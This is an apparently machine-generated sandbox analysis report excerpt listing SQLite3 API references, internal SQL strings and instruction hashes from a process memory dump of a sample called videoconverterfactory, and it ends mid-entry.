                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1465156292-0
                                                                                                      • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                                      • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                                                                      • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                                      • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3064317574-0
                                                                                                      • Opcode ID: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                                                      • Instruction ID: 7a9bf9350bb0d435b7485bd9c083abc2dab3a9c90cc7cce47300d03dda88f0d0
                                                                                                      • Opcode Fuzzy Hash: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                                                      • Instruction Fuzzy Hash: FFD092B4909309AFCB00EF29C48644EBBE5AF98258F40C82DFC98C7314E274E8408F92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                                      • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                                                                      • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                                      • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                                                      • Instruction ID: a276b763828cd9d21177d39229c24ef0f5c00ef14d0f26540801fec71d9d5410
                                                                                                      • Opcode Fuzzy Hash: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                                                      • Instruction Fuzzy Hash: 29E0E2B850430DABDF00CF09D8C198A7BAAFB08264F10C119FC190B304C331E9148BE1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                                      • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                                      • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                                      • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                                      APIs
                                                                                                      • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                                        • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                      • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                                      • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                                      • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                                      • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                                      • API String ID: 1320758876-2501389569
                                                                                                      • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                                      • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                                                      • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                                      • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                                                      APIs
                                                                                                      • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926526
                                                                                                      • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926550
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                        • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926626
                                                                                                      • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926638
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                                      • sqlite3_free.SQLITE3 ref: 60926673
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                                      • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                      • API String ID: 937752868-2111127023
                                                                                                      • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                      • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                                      • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                      • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                                                      • String ID: @$access$cache
                                                                                                      • API String ID: 4158134138-1361544076
                                                                                                      • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                                      • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                                                                      • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                                      • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                                      • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                                      • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                                      • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                                      • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                                      • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                                      • BEGIN;, xrefs: 609485DB
                                                                                                      • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                                      • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                                      • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                                      • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                                      • API String ID: 632333372-52344843
                                                                                                      • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                      • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                                      • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                      • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                                      APIs
                                                                                                        • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                        • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                        • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                                      • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                                      • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                                      • sqlite3_free.SQLITE3 ref: 60960618
                                                                                                      • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                      • String ID: offsets
                                                                                                      • API String ID: 463808202-2642679573
                                                                                                      • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                      • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                                      • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                      • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                                      • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                                      • String ID:
                                                                                                      • API String ID: 2903785150-0
                                                                                                      • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                      • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                                      • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                      • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 423083942-0
                                                                                                      • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                                      • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                                                      • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                                      • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                                      • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                                      • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                                      • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                                      • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                      • String ID:
                                                                                                      • API String ID: 3556715608-0
                                                                                                      • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                      • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                                      • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                      • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                                      APIs
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6095F686
